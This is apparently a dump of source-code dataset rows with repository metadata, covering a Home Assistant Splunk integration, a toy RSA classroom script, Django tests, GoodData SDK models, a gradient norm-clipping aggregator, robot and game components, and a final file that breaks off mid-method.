    hass.bus.async_listen(EVENT_STATE_CHANGED, splunk_event_listener)
    return True
| 29.333333
| 88
| 0.636892
|
"""Support to send data to a Splunk instance."""
import asyncio
from http import HTTPStatus
import json
import logging
import time
from aiohttp import ClientConnectionError, ClientResponseError
from hass_splunk import SplunkPayloadError, hass_splunk
import voluptuous as vol
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PORT,
CONF_SSL,
CONF_TOKEN,
CONF_VERIFY_SSL,
EVENT_STATE_CHANGED,
)
from homeassistant.helpers import state as state_helper
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import FILTER_SCHEMA
from homeassistant.helpers.json import JSONEncoder
_LOGGER = logging.getLogger(__name__)
DOMAIN = "splunk"
CONF_FILTER = "filter"
# Defaults for the Splunk HTTP Event Collector endpoint.
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 8088
DEFAULT_SSL = False
DEFAULT_NAME = "HASS"
# YAML configuration: only the HEC token is required; everything else
# falls back to the defaults above.  The filter limits which entities
# are forwarded.
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Required(CONF_TOKEN): cv.string,
                vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
                vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
                vol.Optional(CONF_SSL, default=False): cv.boolean,
                vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
                vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
                vol.Optional(CONF_FILTER, default={}): FILTER_SCHEMA,
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Set up the Splunk component.

    Validates the HEC token, queues a startup event, and registers a
    state-change listener that forwards filtered entity states to Splunk.
    Returns False when the token check fails, True otherwise.
    """
    conf = config[DOMAIN]
    host = conf.get(CONF_HOST)
    port = conf.get(CONF_PORT)
    token = conf.get(CONF_TOKEN)
    use_ssl = conf[CONF_SSL]
    verify_ssl = conf.get(CONF_VERIFY_SSL)
    name = conf.get(CONF_NAME)
    entity_filter = conf[CONF_FILTER]
    event_collector = hass_splunk(
        session=async_get_clientsession(hass),
        host=host,
        port=port,
        token=token,
        use_ssl=use_ssl,
        verify_ssl=verify_ssl,
    )
    # Validate only the token up front (no connectivity/busy probing).
    if not await event_collector.check(connectivity=False, token=True, busy=False):
        return False
    payload = {
        "time": time.time(),
        "host": name,
        "event": {
            "domain": DOMAIN,
            "meta": "Splunk integration has started",
        },
    }
    # Queue the startup marker without flushing (send=False); it goes out
    # together with the first forwarded state event.
    await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=False)
    async def splunk_event_listener(event):
        """Listen for new messages on the bus and sends them to Splunk."""
        state = event.data.get("new_state")
        # Skip removals and entities excluded by the configured filter.
        if state is None or not entity_filter(state.entity_id):
            return
        try:
            # Prefer a numeric representation; fall back to the raw state string.
            _state = state_helper.state_as_number(state)
        except ValueError:
            _state = state.state
        payload = {
            "time": event.time_fired.timestamp(),
            "host": name,
            "event": {
                "domain": state.domain,
                "entity_id": state.object_id,
                "attributes": dict(state.attributes),
                "value": _state,
            },
        }
        try:
            await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=True)
        except SplunkPayloadError as err:
            # Auth failures are errors; other payload rejections are only warnings.
            if err.status == HTTPStatus.UNAUTHORIZED:
                _LOGGER.error(err)
            else:
                _LOGGER.warning(err)
        except ClientConnectionError as err:
            _LOGGER.warning(err)
        except asyncio.TimeoutError:
            _LOGGER.warning("Connection to %s:%s timed out", host, port)
        except ClientResponseError as err:
            _LOGGER.error(err.message)
    hass.bus.async_listen(EVENT_STATE_CHANGED, splunk_event_listener)
    return True
| 0
| 0
| 0
|
a924a3b3fa825a585783593415bcffef891d3164
| 1,915
|
py
|
Python
|
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
import random
alf=["а","б","в","г","д","е","ё","ж","з","и","й","к","л","м","н","о","п","р","с","т","у","ф","х","ц","ч","ш","щ","ъ","ы","ь","э","ю","я",".",",",":","?"]
zam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]
p=17
q=11
file=open('text.txt',encoding='utf-8')
st1=list(file.read())
file.close()
print(st1)
f,f2=rsa(st1,p,q)
s=sum(f)
print(s)
print(f,f2)
| 19.947917
| 154
| 0.399478
|
import random
def gcd(a, b):
    """Return the greatest common divisor of ``a`` and ``b``.

    Plain Euclidean algorithm.  The original version also carried the
    extended-Euclid coefficient bookkeeping (x/y/lastx/lasty) but never
    used it for the return value; that dead code is removed here.
    """
    n, m = a, b
    while m != 0:
        n, m = m, n % m
    return n
def gcdost(a, b):
    """Return the Bezout coefficient x such that x*a + y*b == gcd(a, b).

    Used by rsa() as the modular inverse of ``a`` modulo ``b`` (the caller
    normalises a negative result by adding ``b``).  The unused y-coefficient
    bookkeeping from the original implementation is dropped; the returned
    value is identical.
    """
    x, lastx = 0, 1
    n, m = a, b
    while m != 0:
        q = n // m
        n, m = m, n - q * m
        x, lastx = lastx - q * x, x
    return lastx
def pmnoj(a):
    """Return the prime factorisation of ``a`` as an ascending list of
    primes with multiplicity, e.g. pmnoj(12) -> [2, 2, 3]."""
    factors = []
    divisor = 2
    # Trial division: once divisor*divisor exceeds the remaining value,
    # whatever is left (if > 1) must itself be prime.
    while divisor * divisor <= a:
        quotient, remainder = divmod(a, divisor)
        if remainder == 0:
            factors.append(divisor)
            a = quotient
        else:
            divisor += 1
    if a > 1:
        factors.append(a)
    return factors
def ferma(c):
    """Fermat probabilistic primality test: True if ``c`` is probably prime.

    Draws up to 1000 random witnesses a in [2, c-2] and rejects ``c`` as
    soon as a**(c-1) % c != 1.  Bug fixed: the original returned inside the
    first loop iteration on both branches, so only a single witness was ever
    tested.  Uses three-argument pow() for fast modular exponentiation
    (identical result to a**(c-1) % c).  Requires c >= 4 (randint bounds).
    """
    for _ in range(1000):
        a = random.randint(2, c - 2)
        if pow(a, c - 1, c) != 1:
            return False
    return True
def rsa(st1, p,q):
    """Toy RSA round-trip over the module alphabet ``alf``/``zam``.

    st1 -- list of characters; each is mapped to its index in ``alf``
    (characters not in the alphabet are silently dropped), encrypted with
    the derived public exponent, then decrypted again.
    Returns (ciphertext list, decrypted index list), or the string
    "Error" when p or q fails the Fermat primality check.

    NOTE(review): the round-trip is only faithful when n = p*q exceeds the
    largest alphabet code in ``zam`` -- confirm for the chosen p, q.
    """
    st2=[]
    res=[]
    res2=[]
    # Both factors must pass the (probabilistic) primality check.
    p1=ferma(p)
    q1=ferma(q)
    if not p1 or not q1:
        return "Error"
    # Encode characters as alphabet indices via the alf -> zam mapping.
    for i in range(len(st1)):
        for j in range(len(alf)):
            if st1[i]==alf[j]:
                st2.append(zam[j])
    n=p*q
    fn=(p-1)*(q-1)  # Euler's totient of n for distinct primes p, q
    # Public exponent: smallest i >= 2 coprime with fn.
    i=2
    while i < fn:
        e=gcd(fn,i)
        if e==1:
            e=i
            break
        i+=1
    # Private exponent: modular inverse of e mod fn, normalised into [0, fn).
    d=gcdost(e,fn)
    if d<0:
        d+=fn
    # Encrypt each code: c = m**e mod n.
    for i in st2:
        res.append((i**e)%n)
    # Decrypt each ciphertext value: m = c**d mod n.
    for i in res:
        res2.append((i**d)%n)
    return res,res2
# Russian alphabet plus punctuation, and the positional codes used for RSA.
alf=["а","б","в","г","д","е","ё","ж","з","и","й","к","л","м","н","о","п","р","с","т","у","ф","х","ц","ч","ш","щ","ъ","ы","ь","э","ю","я",".",",",":","?"]
zam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]
# Toy key factors (small primes -- demonstration only, not secure).
p=17
q=11
# Read the plaintext as a list of single characters.
file=open('text.txt',encoding='utf-8')
st1=list(file.read())
file.close()
print(st1)
# f is the ciphertext list, f2 the recovered plaintext codes.
f,f2=rsa(st1,p,q)
s=sum(f)  # simple checksum over the ciphertext values
print(s)
print(f,f2)
| 1,377
| 0
| 123
|
771784edcc7f5296f6cfcf7f2749b285b3a3b2d4
| 2,522
|
py
|
Python
|
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | 1
|
2021-02-25T17:54:28.000Z
|
2021-02-25T17:54:28.000Z
|
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | null | null | null |
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from .models import Profile
from django.contrib.auth.models import User
import unittest
from .forms import SignUpForm
from .signals import show_login_message, show_logout_message
from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
# Create your tests here.
| 37.641791
| 72
| 0.646709
|
from django.test import TestCase, Client
from .models import Profile
from django.contrib.auth.models import User
import unittest
from .forms import SignUpForm
from .signals import show_login_message, show_logout_message
from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
# Create your tests here.
class ModelsTestCase(TestCase):
    """Integration tests for the accounts app: models, auth flow and pages."""

    def setUp(self):
        # Every test starts with one known user on record.
        User.objects.create_user('testing', password='hello')

    def test_count_user_instance(self):
        """Exactly one User row exists for the test username."""
        users = User.objects.filter(username="testing")
        self.assertEqual(len(users), 1)

    def test_count_profile_instance(self):
        """Creating a User also yields exactly one linked Profile."""
        users = User.objects.filter(username="testing")
        profiles = Profile.objects.filter(user=users[0])
        self.assertEqual(len(profiles), 1)

    def test_index(self):
        """The landing page renders successfully."""
        client = Client()
        index_page = client.get("", secure=True)
        self.assertEqual(index_page.status_code, 200)

    def test_register(self):
        """The registration page renders successfully."""
        client = Client()
        register_page = client.get("/register", secure=True)
        self.assertEqual(register_page.status_code, 200)

    def test_login(self):
        """The login page renders and valid credentials authenticate."""
        client = Client()
        User.objects.get_by_natural_key('testing')
        login_page = client.get("/login", secure=True, follow=True)
        self.assertEqual(login_page.status_code, 200)
        authenticated = client.login(username='testing', password="hello")
        self.assertTrue(authenticated)

    def test_logout(self):
        """Logging out redirects back to the landing page."""
        client = Client()
        User.objects.get_by_natural_key('testing')
        client.login(username='testing', password="hello")
        logout_page = client.get("/logout", secure=True, follow=True)
        self.assertRedirects(logout_page, "https://testserver/", 302, 200)

    def test_account(self):
        """An authenticated user can view the account page."""
        client = Client()
        User.objects.get_by_natural_key('testing')
        client.login(username='testing', password="hello")
        account_page = client.get("/account", secure=True, follow=True)
        self.assertEqual(account_page.status_code, 200)

    def test_contact(self):
        """The contact page renders for anonymous and authenticated users."""
        client = Client()
        anonymous_view = client.get("/contact", secure=True)
        self.assertEqual(anonymous_view.status_code, 200)
        client.login(username='testing', password="hello")
        authenticated_view = client.get("/contact", secure=True)
        self.assertEqual(authenticated_view.status_code, 200)
| 1,699
| 10
| 314
|
ad5dd51fc7ed9905b46da578dce076efe35092ef
| 5,679
|
py
|
Python
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 7
|
2022-01-24T16:27:06.000Z
|
2022-02-25T10:18:49.000Z
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 29
|
2022-01-20T15:45:38.000Z
|
2022-03-31T09:39:25.000Z
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 7
|
2022-01-20T07:11:15.000Z
|
2022-03-09T14:50:17.000Z
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import Any, List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_data_source import DeclarativeDataSource
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_scan_client.model.test_definition_request import TestDefinitionRequest
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.data_source.declarative_model.physical_model.pdm import CatalogDeclarativeTables
from gooddata_sdk.catalog.entity import TokenCredentialsFromFile
from gooddata_sdk.catalog.permissions.permission import CatalogDeclarativeDataSourcePermission
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
BIGQUERY_TYPE = "BIGQUERY"
LAYOUT_DATA_SOURCES_DIR = "data_sources"
@attr.s(auto_attribs=True, kw_only=True)
@attr.s(auto_attribs=True, kw_only=True)
| 42.699248
| 113
| 0.728649
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import Any, List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_data_source import DeclarativeDataSource
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_scan_client.model.test_definition_request import TestDefinitionRequest
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.data_source.declarative_model.physical_model.pdm import CatalogDeclarativeTables
from gooddata_sdk.catalog.entity import TokenCredentialsFromFile
from gooddata_sdk.catalog.permissions.permission import CatalogDeclarativeDataSourcePermission
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
BIGQUERY_TYPE = "BIGQUERY"
LAYOUT_DATA_SOURCES_DIR = "data_sources"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeDataSources(Base):
    """Declarative (layout) representation of all data sources of an organization."""
    # Individual data-source definitions, in layout order.
    data_sources: List[CatalogDeclarativeDataSource]
    def to_api(self, credentials: Optional[dict[str, Any]] = None) -> DeclarativeDataSources:
        """Build the API-client model, optionally injecting credentials.

        ``credentials`` maps data-source id to either a password, or -- for
        BIGQUERY-type sources -- a path to a token file.  Sources without an
        entry are converted without credentials.
        """
        data_sources = []
        client_class = self.client_class()
        credentials = credentials if credentials is not None else dict()
        for data_source in self.data_sources:
            if data_source.id in credentials:
                if data_source.type == BIGQUERY_TYPE:
                    # BigQuery authenticates with a token read from file, not a password.
                    token = TokenCredentialsFromFile.token_from_file(credentials[data_source.id])
                    data_sources.append(data_source.to_api(token=token))
                else:
                    data_sources.append(data_source.to_api(password=credentials[data_source.id]))
            else:
                data_sources.append(data_source.to_api())
        return client_class(data_sources=data_sources)
    @staticmethod
    def client_class() -> Type[DeclarativeDataSources]:
        """Return the generated API-client class this model serialises to."""
        return DeclarativeDataSources
    @staticmethod
    def data_sources_folder(layout_organization_folder: Path) -> Path:
        """Return the data-sources sub-folder of an organization layout folder."""
        return layout_organization_folder / LAYOUT_DATA_SOURCES_DIR
    def store_to_disk(self, layout_organization_folder: Path) -> None:
        """Write every data source to its own sub-folder on disk."""
        data_sources_folder = self.data_sources_folder(layout_organization_folder)
        create_directory(data_sources_folder)
        for data_source in self.data_sources:
            data_source.store_to_disk(data_sources_folder)
    @classmethod
    def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeDataSources:
        """Load all data sources found under the organization layout folder (sorted by id)."""
        data_sources_folder = cls.data_sources_folder(layout_organization_folder)
        data_source_ids = sorted([p.stem for p in data_sources_folder.iterdir() if p.is_dir()])
        data_sources = []
        for data_source_id in data_source_ids:
            data_sources.append(CatalogDeclarativeDataSource.load_from_disk(data_sources_folder, data_source_id))
        return cls(data_sources=data_sources)
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeDataSource(Base):
    """Declarative (layout) representation of a single data source."""
    id: str
    type: str
    name: str
    url: str
    schema: str
    enable_caching: Optional[bool] = None
    # Physical data model; stripped when storing the layout to disk.
    pdm: Optional[CatalogDeclarativeTables] = None
    cache_path: Optional[List[str]] = None
    username: Optional[str] = None
    # NOTE(review): bare mutable default -- attrs with auto_attribs converts it
    # to a per-instance factory, so instances should not share the list; verify
    # against the attrs version in use.
    permissions: List[CatalogDeclarativeDataSourcePermission] = []
    def to_test_request(
        self,
        password: Optional[str] = None,
        token: Optional[str] = None,
    ) -> TestDefinitionRequest:
        """Build a scan-client TestDefinitionRequest for connection testing.

        Only the credentials actually supplied (password/token) and a
        configured username are included in the request.
        """
        kwargs: dict[str, Any] = {"schema": self.schema}
        if password is not None:
            kwargs["password"] = password
        if token is not None:
            kwargs["token"] = token
        if self.username is not None:
            kwargs["username"] = self.username
        return TestDefinitionRequest(type=self.type, url=self.url, **kwargs)
    @staticmethod
    def client_class() -> Type[DeclarativeDataSource]:
        """Return the generated API-client class this model serialises to."""
        return DeclarativeDataSource
    @staticmethod
    def data_source_folder(data_sources_folder: Path, data_source_id: str) -> Path:
        """Return (creating it if needed) the folder for one data source's layout."""
        data_source_folder = data_sources_folder / data_source_id
        create_directory(data_source_folder)
        return data_source_folder
    def to_api(
        self, password: Optional[str] = None, token: Optional[str] = None, include_nested_structures: bool = True
    ) -> DeclarativeDataSource:
        """Convert to the API-client model, optionally embedding credentials.

        When ``include_nested_structures`` is False the physical data model
        ("pdm") is removed from the payload -- this is the form stored on disk.
        """
        dictionary = self._get_snake_dict()
        if not include_nested_structures:
            del dictionary["pdm"]
        if password is not None:
            dictionary["password"] = password
        if token is not None:
            dictionary["token"] = token
        return self.client_class().from_dict(dictionary)
    def store_to_disk(self, data_sources_folder: Path) -> None:
        """Write <id>/<id>.yaml (without pdm) and the pdm files alongside it."""
        data_source_folder = self.data_source_folder(data_sources_folder, self.id)
        file_path = data_source_folder / f"{self.id}.yaml"
        data_source_dict = self.to_api(include_nested_structures=False).to_dict(camel_case=True)
        write_layout_to_file(file_path, data_source_dict)
        if self.pdm is not None:
            self.pdm.store_to_disk(data_source_folder)
    @classmethod
    def load_from_disk(cls, data_sources_folder: Path, data_source_id: str) -> CatalogDeclarativeDataSource:
        """Read <id>/<id>.yaml plus the stored pdm back into a model object."""
        data_source_folder = data_sources_folder / data_source_id
        data_source_file_path = data_source_folder / f"{data_source_id}.yaml"
        pdm = CatalogDeclarativeTables.load_from_disk(data_source_folder)
        data_source_dict = read_layout_from_file(data_source_file_path)
        data_source = CatalogDeclarativeDataSource.from_dict(data_source_dict)
        data_source.pdm = pdm
        return data_source
| 3,856
| 804
| 44
|
ce36ea79006e4c6ff0cb9ffe5a3b3419b733b588
| 1,321
|
py
|
Python
|
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | 5
|
2022-01-21T06:21:51.000Z
|
2022-02-11T23:00:57.000Z
|
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | null | null | null |
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | null | null | null |
# Copyright (c) Anish Acharya.
# Licensed under the MIT License
import numpy as np
from .base_gar import GAR
from typing import List
"""
Ghosh et.al. Communication-Efficient and Byzantine-Robust Distributed Learning with Error Feedback
"""
| 32.219512
| 98
| 0.632097
|
# Copyright (c) Anish Acharya.
# Licensed under the MIT License
import numpy as np
from .base_gar import GAR
from typing import List
"""
Ghosh et.al. Communication-Efficient and Byzantine-Robust Distributed Learning with Error Feedback
"""
class NormClipping(GAR):
    """Gradient aggregation rule that drops the alpha-fraction of client
    gradients with the largest norms and averages the remainder."""
    def __init__(self, aggregation_config):
        GAR.__init__(self, aggregation_config=aggregation_config)
        # Find Number of top norms to drop
        # alpha = fraction of clients to clip; the absolute count k is derived
        # lazily from the batch shape on the first aggregate() call.
        self.alpha = self.aggregation_config.get("norm_clip_config", {}).get("alpha", 0.1)
        self.k = None
    def aggregate(self, G: np.ndarray, ix: List[int] = None, axis=0) -> np.ndarray:
        """Aggregate stacked client gradients ``G`` (one row per client).

        Returns the weighted average with the k largest-norm rows zero-weighted;
        when ``ix`` is given, only those coordinates of the result are returned.
        """
        # Compute norms of each gradient vector
        # norm_dist = np.linalg.norm(G, axis=1)
        if self.k is None:
            self.k = int(G.shape[0] * self.alpha)
            print('Norm clipping {} clients'.format(self.k))
        # Row-wise Euclidean norms via einsum (equivalent to np.linalg.norm(G, axis=1)).
        norms = np.sqrt(np.einsum('ij,ij->i', G, G))
        top_k_indices = np.argsort(np.abs(norms))[::-1][:self.k]
        # set weights of them to 0 filtering k top ones based on norm
        alphas = np.ones(G.shape[0]) * (1 / (G.shape[0] - self.k))
        alphas[top_k_indices] = 0
        agg_grad = self.weighted_average(stacked_grad=G, alphas=alphas)
        if ix is not None:
            return agg_grad[ix]
        else:
            return agg_grad
| 998
| 3
| 77
|
fd042e0095f353ffb4caebc0a7ea0f6645226317
| 1,157
|
py
|
Python
|
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | null | null | null |
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | null | null | null |
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | 1
|
2021-12-31T06:48:41.000Z
|
2021-12-31T06:48:41.000Z
|
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_shell.common.constants import ChoicesEnum
from django.utils.translation import ugettext_lazy as _
| 39.896552
| 115
| 0.71478
|
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_shell.common.constants import ChoicesEnum
from django.utils.translation import ugettext_lazy as _
class DynamicFieldTypeEnum(ChoicesEnum):
    """Value types a dynamic (custom) profile field can take."""
    STRING = "string"
    ONE_ENUM = "one_enum"      # single-choice enumeration
    MULTI_ENUM = "multi_enum"  # multi-choice enumeration
    NUMBER = "number"
    TIMER = "timer"            # date value (see label below)
    # (value, translated display label) pairs consumed by ChoicesEnum.
    _choices_labels = (
        (STRING, _("字符串")),
        (ONE_ENUM, _("枚举")),
        (MULTI_ENUM, _("多枚举")),
        (NUMBER, _("数值")),
        (TIMER, _("日期")),
    )
| 0
| 336
| 23
|
3345d41bb3626517b8edf0dd1361709a68331cf3
| 1,611
|
py
|
Python
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 2
|
2021-12-08T05:02:28.000Z
|
2021-12-29T14:47:55.000Z
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 19
|
2019-01-07T01:42:07.000Z
|
2019-03-08T05:38:52.000Z
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 7
|
2018-10-29T05:09:50.000Z
|
2020-04-16T04:04:18.000Z
|
from wpilib.command import Subsystem
from constants import Constants
from utils import singleton, lazytalonsrx
import logging
from commands import rollclimbroller
class ClimbRoller(Subsystem, metaclass=singleton.Singleton):
"""The climb roller subsystem controlls the rollers on the end of the front arm."""
def init(self):
"""Initialize the intake motors. This is not in the constructor to make the calling explicit in the robotInit to the robot simulator."""
self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.CRL_MOTOR_ID)
self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.CRR_MOTOR_ID)
self.l_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Left")
self.r_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Right")
def setPercentOutput(self, l_signal, r_signal):
"""Set the percent output of the 2 motors."""
self.l_motor.setPercentOutput(l_signal, max_signal=1)
self.r_motor.setPercentOutput(r_signal, max_signal=1)
def roll(self, signal):
"""Move the rollers at the same speed."""
if(signal > 0):
logging.warn("Will not roll climb rollers backwards")
return
self.setPercentOutput(signal, signal)
def stop(self):
"""Stop the rollers."""
self.setPercentOutput(0, 0)
| 35.8
| 144
| 0.68653
|
from wpilib.command import Subsystem
from constants import Constants
from utils import singleton, lazytalonsrx
import logging
from commands import rollclimbroller
class ClimbRoller(Subsystem, metaclass=singleton.Singleton):
    """The climb roller subsystem controls the rollers on the end of the front arm."""

    def __init__(self):
        super().__init__()

    def init(self):
        """Initialize the roller motors. This is not in the constructor to make the calling explicit in the robotInit to the robot simulator."""
        self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.CRL_MOTOR_ID)
        self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.CRR_MOTOR_ID)
        self.l_motor.initialize(
            inverted=False, encoder=False, name="Climb Roller Left")
        self.r_motor.initialize(
            inverted=False, encoder=False, name="Climb Roller Right")

    def outputToDashboard(self):
        """Push both motors' telemetry to the dashboard."""
        self.l_motor.outputToDashboard()
        self.r_motor.outputToDashboard()

    def setPercentOutput(self, l_signal, r_signal):
        """Set the percent output of the 2 motors."""
        self.l_motor.setPercentOutput(l_signal, max_signal=1)
        self.r_motor.setPercentOutput(r_signal, max_signal=1)

    def roll(self, signal):
        """Move the rollers at the same speed; positive (backward) commands are refused."""
        if signal > 0:
            # Fixed: logging.warn is a deprecated alias of logging.warning.
            logging.warning("Will not roll climb rollers backwards")
            return
        self.setPercentOutput(signal, signal)

    def stop(self):
        """Stop the rollers."""
        self.setPercentOutput(0, 0)

    def periodic(self):
        """Called by the scheduler every loop; keeps dashboard data fresh."""
        self.outputToDashboard()
| 145
| 0
| 81
|
688b529ea69dada848d8352c8c56bb04fd013fa4
| 3,164
|
py
|
Python
|
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:37.000Z
|
2021-05-20T19:33:37.000Z
|
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
from objects.components import Component, types, ComponentPriority
from objects.components.state import TunableStateTypeReference, TunableStateValueReference
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, TunableList, TunableReference, Tunable
import services
import sims4.resources
from snippets import define_snippet
(_, TunableStereoComponentSnippet) = define_snippet('stereo_component', StereoComponent.TunableFactory())
| 117.185185
| 1,759
| 0.708597
|
from objects.components import Component, types, ComponentPriority
from objects.components.state import TunableStateTypeReference, TunableStateValueReference
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, TunableList, TunableReference, Tunable
import services
import sims4.resources
from snippets import define_snippet
class StereoComponent(Component, HasTunableFactory, AutoFactoryInit, component_name=types.STEREO_COMPONENT):
FACTORY_TUNABLES = {'channel_state': TunableStateTypeReference(description='\n The state used to populate the radio stations'), 'off_state': TunableStateValueReference(description='\n The channel that represents the off state.'), 'listen_affordances': TunableList(description='\n An ordered list of affordances that define "listening" to this\n stereo. The first succeeding affordance is used.\n ', tunable=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.INTERACTION), pack_safe=True)), 'play_on_active_sim_only': Tunable(description='\n If enabled, and audio target is Sim, the audio will only be \n played on selected Sim. Otherwise it will be played regardless \n Sim is selected or not.\n \n If audio target is Object, always set this to False. Otherwise\n the audio will never be played.\n \n ex. This will be useful for Earbuds where we want to hear the\n music only when the Sim is selected.\n \n This is passed down to the audio state when it is triggered, and thus\n will overwrite any tuning on the state value.\n ', tunable_type=bool, default=False), 'immediate': Tunable(description='\n If checked, this audio will be triggered immediately, nothing\n will block.\n \n ex. Earbuds audio will be played immediately while \n the Sim is routing or animating.\n \n This is passed down to the audio state when it is triggered, and thus\n will overwrite any tuning on the state value.\n ', tunable_type=bool, default=False)}
    def is_stereo_turned_on(self):
